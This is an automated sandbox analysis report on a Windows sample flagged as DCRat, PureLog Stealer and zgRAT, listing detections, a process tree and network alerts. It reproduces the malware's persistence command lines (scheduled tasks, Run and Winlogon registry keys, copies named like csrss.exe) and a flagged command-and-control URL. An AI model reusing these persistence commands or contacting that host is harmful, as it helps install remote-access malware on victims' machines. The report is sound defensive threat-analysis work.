Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
KtMg6d1Ivx.exe

Overview

General Information

Sample name:KtMg6d1Ivx.exe
renamed because original name is a hash value
Original sample name:b2b416d08c3391ce0842d998e0d5f273.exe
Analysis ID:1385347
MD5:b2b416d08c3391ce0842d998e0d5f273
SHA1:b384e63d2d57c5c744d1da4e5e92faad09228ab1
SHA256:54471e79557fcf3f12279ab32be68aee2ca1cfd68e29134d0b34caf6975c3254
Tags:DCRatexe
Infos:

Detection

DCRat, PureLog Stealer, zgRAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Schedule system process
Snort IDS alert for network traffic
Yara detected DCRat
Yara detected PureLog Stealer
Yara detected zgRAT
.NET source code contains potential unpacker
Creates an autostart registry key pointing to binary in C:\Windows
Creates an undocumented autostart registry key
Creates autostart registry keys with suspicious values (likely registry only malware)
Creates multiple autostart registry keys
Creates processes via WMI
Drops PE files with benign system names
Drops executables to the windows directory (C:\Windows) and starts them
Infects executable files (exe, dll, sys, html)
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: System File Execution Location Anomaly
Uses schtasks.exe or at.exe to add and modify task schedules
Allocates memory with a write watch (potentially for evading sandboxes)
Compiles C# or VB.Net code
Contains functionality to detect virtual machines (SLDT)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: CurrentVersion NT Autorun Keys Modification
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Suspicious Powershell In Registry Run Keys
Tries to load missing DLLs
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • KtMg6d1Ivx.exe (PID: 5456 cmdline: C:\Users\user\Desktop\KtMg6d1Ivx.exe MD5: B2B416D08C3391CE0842D998E0D5F273)
    • schtasks.exe (PID: 1488 cmdline: schtasks.exe /create /tn "dZtDLPHWGnqMECrRIGtvnULd" /sc MINUTE /mo 10 /tr "'C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 3364 cmdline: schtasks.exe /create /tn "dZtDLPHWGnqMECrRIGtvnUL" /sc ONLOGON /tr "'C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 1632 cmdline: schtasks.exe /create /tn "dZtDLPHWGnqMECrRIGtvnULd" /sc MINUTE /mo 12 /tr "'C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • csc.exe (PID: 5720 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\feaq5o3p\feaq5o3p.cmdline MD5: F65B029562077B648A6A5F6A1AA76A66)
      • conhost.exe (PID: 4720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cvtres.exe (PID: 6428 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESFB8.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSCBB09EA61AE75492FB889F62CD03E359D.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
    • csc.exe (PID: 1876 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jnwwums3\jnwwums3.cmdline MD5: F65B029562077B648A6A5F6A1AA76A66)
      • conhost.exe (PID: 7152 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cvtres.exe (PID: 4320 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES11BC.tmp" "c:\Windows\System32\CSCB818CC877B7C4E7BA59872CD9B93F1.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
    • schtasks.exe (PID: 4080 cmdline: schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 11 /tr "'C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 5636 cmdline: schtasks.exe /create /tn "Registry" /sc ONLOGON /tr "'C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 6148 cmdline: schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 6 /tr "'C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 2180 cmdline: schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 7 /tr "'C:\Windows\ImmersiveControlPanel\pris\conhost.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 1096 cmdline: schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Windows\ImmersiveControlPanel\pris\conhost.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 2452 cmdline: schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 14 /tr "'C:\Windows\ImmersiveControlPanel\pris\conhost.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 892 cmdline: schtasks.exe /create /tn "dZtDLPHWGnqMECrRIGtvnULd" /sc MINUTE /mo 13 /tr "'C:\Windows\Downloaded Program Files\dZtDLPHWGnqMECrRIGtvnUL.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 6428 cmdline: schtasks.exe /create /tn "dZtDLPHWGnqMECrRIGtvnUL" /sc ONLOGON /tr "'C:\Windows\Downloaded Program Files\dZtDLPHWGnqMECrRIGtvnUL.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 6092 cmdline: schtasks.exe /create /tn "dZtDLPHWGnqMECrRIGtvnULd" /sc MINUTE /mo 13 /tr "'C:\Windows\Downloaded Program Files\dZtDLPHWGnqMECrRIGtvnUL.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 4720 cmdline: schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 9 /tr "'C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 1864 cmdline: schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 1352 cmdline: schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 7 /tr "'C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • cmd.exe (PID: 4080 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\oZ7RJBQMGt.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 1084 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • chcp.com (PID: 1488 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
      • w32tm.exe (PID: 3524 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)
      • Registry.exe (PID: 1848 cmdline: "C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exe" MD5: B2B416D08C3391CE0842D998E0D5F273)
    • csrss.exe (PID: 5720 cmdline: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exe MD5: B2B416D08C3391CE0842D998E0D5F273)
  • dZtDLPHWGnqMECrRIGtvnUL.exe (PID: 6484 cmdline: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exe MD5: B2B416D08C3391CE0842D998E0D5F273)
  • dZtDLPHWGnqMECrRIGtvnUL.exe (PID: 1772 cmdline: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exe MD5: B2B416D08C3391CE0842D998E0D5F273)
  • conhost.exe (PID: 3692 cmdline: C:\Windows\ImmersiveControlPanel\pris\conhost.exe MD5: B2B416D08C3391CE0842D998E0D5F273)
  • conhost.exe (PID: 4668 cmdline: C:\Windows\ImmersiveControlPanel\pris\conhost.exe MD5: B2B416D08C3391CE0842D998E0D5F273)
  • csrss.exe (PID: 5948 cmdline: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exe MD5: B2B416D08C3391CE0842D998E0D5F273)
  • Registry.exe (PID: 6660 cmdline: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exe MD5: B2B416D08C3391CE0842D998E0D5F273)
  • Registry.exe (PID: 2408 cmdline: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exe MD5: B2B416D08C3391CE0842D998E0D5F273)
  • dZtDLPHWGnqMECrRIGtvnUL.exe (PID: 6488 cmdline: "C:\Windows\Downloaded Program Files\dZtDLPHWGnqMECrRIGtvnUL.exe" MD5: B2B416D08C3391CE0842D998E0D5F273)
  • Registry.exe (PID: 4280 cmdline: "C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exe" MD5: B2B416D08C3391CE0842D998E0D5F273)
  • conhost.exe (PID: 6576 cmdline: "C:\Windows\ImmersiveControlPanel\pris\conhost.exe" MD5: B2B416D08C3391CE0842D998E0D5F273)
  • csrss.exe (PID: 4996 cmdline: "C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exe" MD5: B2B416D08C3391CE0842D998E0D5F273)
  • dZtDLPHWGnqMECrRIGtvnUL.exe (PID: 2924 cmdline: "C:\Windows\Downloaded Program Files\dZtDLPHWGnqMECrRIGtvnUL.exe" MD5: B2B416D08C3391CE0842D998E0D5F273)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
DCRatDCRat is a typical RAT that has been around since at least June 2019.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat
NameDescriptionAttributionBlogpost URLsLink
zgRATzgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.2044761761.0000000012F3D000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
    00000027.00000002.3254317705.0000000002AFF000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
      00000000.00000002.2049594682.000000001B980000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
        00000000.00000002.2049594682.000000001B980000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
          00000000.00000002.2044761761.000000001307A000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
            Click to see the 3 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            0.2.KtMg6d1Ivx.exe.1b980000.3.raw.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
              0.2.KtMg6d1Ivx.exe.1b980000.3.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                0.2.KtMg6d1Ivx.exe.1b980000.3.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                  0.2.KtMg6d1Ivx.exe.1b980000.3.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security

                    Sigma Signatures

                    System Summary

                    barindex
                    Sigma detected: Files With System Process Name In Unsuspected Locations
                    Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\KtMg6d1Ivx.exe, ProcessId: 5456, TargetFilename: C:\Windows\ImmersiveControlPanel\pris\conhost.exe
                    Sigma detected: System File Execution Location Anomaly
                    Source: Process startedAuthor: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: C:\Windows\ImmersiveControlPanel\pris\conhost.exe, CommandLine: C:\Windows\ImmersiveControlPanel\pris\conhost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\ImmersiveControlPanel\pris\conhost.exe, NewProcessName: C:\Windows\ImmersiveControlPanel\pris\conhost.exe, OriginalFileName: C:\Windows\ImmersiveControlPanel\pris\conhost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1068, ProcessCommandLine: C:\Windows\ImmersiveControlPanel\pris\conhost.exe, ProcessId: 3692, ProcessName: conhost.exe
                    Sigma detected: CurrentVersion Autorun Keys Modification
                    Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\KtMg6d1Ivx.exe, ProcessId: 5456, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dZtDLPHWGnqMECrRIGtvnUL
                    Sigma detected: CurrentVersion NT Autorun Keys Modification
                    Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: explorer.exe, "C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\KtMg6d1Ivx.exe, ProcessId: 5456, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell
                    Sigma detected: Dynamic .NET Compilation Via Csc.EXE
                    Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\feaq5o3p\feaq5o3p.cmdline, CommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\feaq5o3p\feaq5o3p.cmdline, CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: C:\Users\user\Desktop\KtMg6d1Ivx.exe, ParentImage: C:\Users\user\Desktop\KtMg6d1Ivx.exe, ParentProcessId: 5456, ParentProcessName: KtMg6d1Ivx.exe, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\feaq5o3p\feaq5o3p.cmdline, ProcessId: 5720, ProcessName: csc.exe
                    Sigma detected: Suspicious Powershell In Registry Run Keys
                    Source: Registry Key setAuthor: frack113, Florian Roth (Nextron Systems): Data: Details: "C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\KtMg6d1Ivx.exe, ProcessId: 5456, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Registry
                    Sigma detected: Dynamic CSharp Compile Artefact
                    Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Users\user\Desktop\KtMg6d1Ivx.exe, ProcessId: 5456, TargetFilename: C:\Users\user\AppData\Local\Temp\feaq5o3p\feaq5o3p.cmdline
                    Sigma detected: Windows Processes Suspicious Parent Directory
                    Source: Process startedAuthor: vburov: Data: Command: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exe, CommandLine: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exe, CommandLine|base64offset|contains: , Image: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exe, ParentCommandLine: C:\Users\user\Desktop\KtMg6d1Ivx.exe, ParentImage: C:\Users\user\Desktop\KtMg6d1Ivx.exe, ParentProcessId: 5456, ParentProcessName: KtMg6d1Ivx.exe, ProcessCommandLine: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exe, ProcessId: 5720, ProcessName: csrss.exe

                    Data Obfuscation

                    barindex
                    Sigma detected: Dot net compiler compiles file from suspicious location
                    Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\feaq5o3p\feaq5o3p.cmdline, CommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\feaq5o3p\feaq5o3p.cmdline, CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: C:\Users\user\Desktop\KtMg6d1Ivx.exe, ParentImage: C:\Users\user\Desktop\KtMg6d1Ivx.exe, ParentProcessId: 5456, ParentProcessName: KtMg6d1Ivx.exe, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\feaq5o3p\feaq5o3p.cmdline, ProcessId: 5720, ProcessName: csc.exe

                    Persistence and Installation Behavior

                    barindex
                    Sigma detected: Schedule system process
                    Source: Process startedAuthor: Joe Security: Data: Command: schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 11 /tr "'C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exe'" /f, CommandLine: schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 11 /tr "'C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exe'" /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: C:\Users\user\Desktop\KtMg6d1Ivx.exe, ParentImage: C:\Users\user\Desktop\KtMg6d1Ivx.exe, ParentProcessId: 5456, ParentProcessName: KtMg6d1Ivx.exe, ProcessCommandLine: schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 11 /tr "'C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exe'" /f, ProcessId: 4080, ProcessName: schtasks.exe

                    Snort Signatures

                    Timestamp:192.168.2.5185.87.199.10749711802048095 02/02/24-04:52:24.865071
                    SID:2048095
                    Source Port:49711
                    Destination Port:80
                    Protocol:TCP
                    Classtype:A Network Trojan was detected

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Antivirus / Scanner detection for submitted sample
                    Source: KtMg6d1Ivx.exeAvira: detected
                    Antivirus detection for URL or domain
                    Source: http://185.87.199.107/Temporary/Sql6Js8/Wordpress3/7Sqlasync/8/PublicMariadb/central/to_ServerAsyncPublicTemp.phpAvira URL Cloud: Label: malware
                    Source: http://185.87.199.107/Temporary/Sql6Js8/Wordpress3/7Sqlasync/8/PublicMariadb/central/Avira URL Cloud: Label: malware
                    Source: http://185.87.199.107Avira URL Cloud: Label: malware
                    Source: http://185.87.199.107/Temporary/Sql6Js8/Wordpress3/7Sqlasync/8/PublicMariadb/central/to_ServerAsyncPAvira URL Cloud: Label: malware
                    Antivirus detection for dropped file
                    Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exeAvira: detection malicious, Label: TR/Dropper.Gen
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeAvira: detection malicious, Label: TR/Dropper.Gen
                    Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exeAvira: detection malicious, Label: TR/Dropper.Gen
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exeAvira: detection malicious, Label: TR/Dropper.Gen
                    Source: C:\Users\user\AppData\Local\Temp\oZ7RJBQMGt.batAvira: detection malicious, Label: BAT/Runner.IL
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeAvira: detection malicious, Label: TR/Dropper.Gen
                    Multi AV Scanner detection for dropped file
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exeReversingLabs: Detection: 75%
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exeVirustotal: Detection: 72%Perma Link
                    Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exeReversingLabs: Detection: 75%
                    Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exeVirustotal: Detection: 72%Perma Link
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeReversingLabs: Detection: 75%
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeVirustotal: Detection: 72%Perma Link
                    Source: C:\Users\user\Desktop\bveMYDWO.logVirustotal: Detection: 11%Perma Link
                    Source: C:\Users\user\Desktop\vnUJHstD.logVirustotal: Detection: 11%Perma Link
                    Source: C:\Windows\Downloaded Program Files\dZtDLPHWGnqMECrRIGtvnUL.exeReversingLabs: Detection: 75%
                    Source: C:\Windows\Downloaded Program Files\dZtDLPHWGnqMECrRIGtvnUL.exeVirustotal: Detection: 72%Perma Link
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeReversingLabs: Detection: 75%
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeVirustotal: Detection: 72%Perma Link
                    Multi AV Scanner detection for submitted file
                    Source: KtMg6d1Ivx.exeReversingLabs: Detection: 75%
                    Source: KtMg6d1Ivx.exeVirustotal: Detection: 72%Perma Link
                    Machine Learning detection for dropped file
                    Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exeJoe Sandbox ML: detected
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeJoe Sandbox ML: detected
                    Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exeJoe Sandbox ML: detected
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exeJoe Sandbox ML: detected
                    Source: C:\Windows\System32\SecurityHealthSystray.exeJoe Sandbox ML: detected
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeJoe Sandbox ML: detected
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeJoe Sandbox ML: detected
                    Machine Learning detection for sample
                    Source: KtMg6d1Ivx.exeJoe Sandbox ML: detected
                    Source: KtMg6d1Ivx.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeDirectory created: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exeJump to behavior
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeDirectory created: C:\Program Files\Microsoft\d28c056a32d4fcJump to behavior
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeDirectory created: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeJump to behavior
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeDirectory created: C:\Program Files\WindowsPowerShell\Configuration\Schema\ee2ad38f3d4382Jump to behavior
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeDirectory created: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exeJump to behavior
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeDirectory created: C:\Program Files\Google\Chrome\Application\117.0.5938.132\886983d96e3d3eJump to behavior
                    Source: KtMg6d1Ivx.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: 8C:\Users\user\AppData\Local\Temp\jnwwums3\jnwwums3.pdb source: KtMg6d1Ivx.exe, 00000000.00000002.2040685305.0000000003804000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: 8C:\Users\user\AppData\Local\Temp\feaq5o3p\feaq5o3p.pdb source: KtMg6d1Ivx.exe, 00000000.00000002.2040685305.0000000003804000.00000004.00000800.00020000.00000000.sdmp

                    Spreading

                    barindex
                    Infects executable files (exe, dll, sys, html)
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSystem file written: C:\Windows\System32\SecurityHealthSystray.exeJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeJump to behavior
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeFile opened: C:\Users\userJump to behavior
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeFile opened: C:\Users\user\AppDataJump to behavior
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeCode function: 4x nop then jmp 00007FF848F426F6h0_2_00007FF848F31CA5
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeCode function: 4x nop then jmp 00007FF848F426F6h0_2_00007FF848F31CF2
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeCode function: 4x nop then mov dword ptr [ebp-04h], 7FFFFFFFh0_2_00007FF8490E896D
                    Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exeCode function: 4x nop then jmp 00007FF848F226F6h11_2_00007FF848F11CA5
                    Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exeCode function: 4x nop then jmp 00007FF848F226F6h11_2_00007FF848F11CF2
                    Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exeCode function: 4x nop then jmp 00007FF848F426F6h12_2_00007FF848F424EE
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeCode function: 4x nop then jmp 00007FF848F226F6h30_2_00007FF848F224EE
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exeCode function: 4x nop then jmp 00007FF848F326F6h31_2_00007FF848F21CA5
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exeCode function: 4x nop then jmp 00007FF848F326F6h31_2_00007FF848F21CF2
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exeCode function: 4x nop then jmp 00007FF848F126F6h32_2_00007FF848F01CF2
